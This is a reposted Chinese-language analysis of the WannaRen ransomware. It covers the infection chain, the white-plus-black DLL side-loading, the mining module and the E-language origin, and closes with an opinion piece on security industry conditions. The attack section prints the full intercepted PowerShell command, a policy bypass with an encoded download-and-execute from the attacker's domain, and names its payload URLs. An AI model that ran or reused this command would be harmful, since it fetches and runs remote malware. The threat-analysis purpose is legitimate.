WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒

近日,有網友在社交媒體公開求助,稱感染了一款名爲 WannaRen 的新型勒索軟件,部分文件被加密,需要支付 0.05 個比特幣(約合 2500 元人民幣)。

部分截圖如下:
WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒

WannaRen 解密器圖標僞裝 Everything。
WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒奇安信病毒響應中心在發現該情況後,第一時間發佈了關於該 WannaRen 的樣本解密器分析報告。
勒索軟件的樣本解密器截圖:
WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒

攻擊事件分析

根據線索,我們發現於 4 月 2 號天擎用戶的攔截日誌顯示
powershell.exe -ep bypass -eSQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA 通過解碼發現 powershell 會去下載並執行 cs.sslsngyl90.com 的腳本。實際上該域名會重定向至如下鏈接。http://cpu.sslsngyl90.com/vip.txt 從 Vip.txt 中的腳本可見攻擊者會從 vim-cn.com 圖牀上下載 WINWORD.EXE 和 wwlib.dll,這種是典型的白加黑攻擊手段。通過執行 WINWORD.EXE 即可加載於同一目錄的 wwlib.dll。
WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒緊接着 wwlib.dll 會去加載 Public 目錄下的 you 程序,有趣的是,fm 文件會記錄程序的運行時間,該時間使用簡體中文進行記錄,因此攻擊者是中國人的概率非常大。
WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒

該程序需要會使用 busahk87909we 對 you 進行解密,解密後在內存加載 WannaRen 勒索軟件
WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒之後的事,跟開頭的感染後的症狀一致了。 除了上面的勒索情況外,Powershell 下載器還具有挖礦功能,其下載後會重命名爲 nb.exe,其意指中文的WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒
有趣的是,在事情發酵之後,攻擊者刪除了腳本中,下載勒索模塊的鏈接,變成了下面這個模塊。**WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒

我們可以合理的猜測,勒索軟件作者都沒有料到,就因爲他將勒索軟件命名爲 WannaRen,收到了如此大的關注,因此將鏈接刪掉從而試圖逃避檢測。

WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒

國貨來了,易語言開發新型勒索病毒

**
**

近日,互聯網上出現了一種後置名爲“WannaRen”的新型比特幣勒索病毒,並且實現了大規模傳播。還在今日登上了微博熱搜排行榜引發廣泛爭議。
WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒
中了新型勒索病毒,被加密文件後綴名變爲“. WannaRen”,並被索取 0.05 比特幣作爲解密贖金。現價合人民幣 3000 左右,真太便宜了,國外的起步價都上萬。
經火絨分析該病毒使用易語言編寫。
先介紹一下易語言:
易語言(EPL)是一門以中文作爲程序代碼編程語言,其以“易”著稱,創始人爲吳濤。創造易語言的初衷是進行用中文來編寫程序的實踐,方便中國人以中國人的思維編寫程序,並不用再去學習西方思維。易語言的誕生極大的降低了編程的門檻和學習的難度。
WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒
之前中國人學習編程,需要最少學會幾百個單詞,學英文,才能編程。用易語言 90% 以上中國人,原因很簡單,中國人學英文費勁,國外人要用易語言編程首先要學中文,衆所周知學中文頂難的,老外有學會中文要很長時間,這時間也可以學會最少兩門編程語言,C 語言,python。所以用易語言不說全部吧,絕大部分都是中國人,由此推斷用易語言寫勒索病毒應當是懂中文的人。
前些天抓起來一個人寫勒索病毒,用微信收贖金。用易語言寫勒索病毒,幾年前就出現了,作者吳濤還過寫一篇文章《請不要給易語言貼標籤 》,用什麼編程語言寫病毒,跟編程語言沒有任何關係,簡單,上手快,但是後來不用了,原因是國內殺病毒軟件無差別提示病毒,就算正常的程序,就寫一個對話框都提示是病毒。以 xxx,3 個數字的安全公司爲首。實際 C 語言寫的病毒更多,python 也有,爲什麼唯有易語言一刀切?本人個人看法就是狹隘與不自信。國外的編程工具病毒再多也不敢都不差別報病毒並殺掉,國產的編程語言得不到重視,隨便查殺。現在都 2020 年,老外全都在學中文,孔子學院全球開花。讓老外用中文編程有什麼不行的?拿出民族自信,文化自信,崇洋媚外,不是什麼好傳統。
最近國內網絡安全環境不太好,SRC 提交個高危漏洞給 10 元人民幣,HW 各種費用結算不了,很多安全公司都勉強支撐。之前網絡安全比較好的時候,都不會考慮灰色行業,勒索病毒行業都上十億的收入,當前這個情況很難保證一些人會挺而走險。
勒索病毒之前的主力軍不在中國,以西方國家小國與俄羅斯爲主。如果國人取而代之成爲主力軍,可能的後果 .....
1,不光要勒索贖金,公開數據,還可以將數據倒賣了。2,國人對中國企業更瞭解,中國企業將損失更大
3,會搶佔國外市場,價格能做到
還有什麼後果,有什麼看法,歡迎留言交流!
文章整合自:奇安信威脅情報中心、黑白之道

猜你喜歡這是赤裸裸打網絡安全從業者的臉!昨晚停網後,我寫了一段代碼破解了隔壁小姐姐的 wifi 密碼 ...有黑客正在通過骨幹網絡發動中間人攻擊 國內多個省市區均受攻擊影響怎樣從零學起成爲一名黑客?
安裝輸入法後用戶主頁被篡改,男子“種木馬”牟利被判刑
數以萬計的私人 Zoom 錄像被無意上傳到視頻雲 供任何人在線觀看
支付寶賬戶需要重新實名認證?小心被釣魚!
黑客入侵 Elasticsearch,破壞了超 1.5 萬臺服務器
境外 APT 組織利用深信服 VPN 漏洞入侵事件通告

WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒

WannaRen 勒索病毒分析:實屬易語言開發新型勒索病毒你點的每個贊,我都認真當成了喜歡

來源鏈接:mp.weixin.qq.com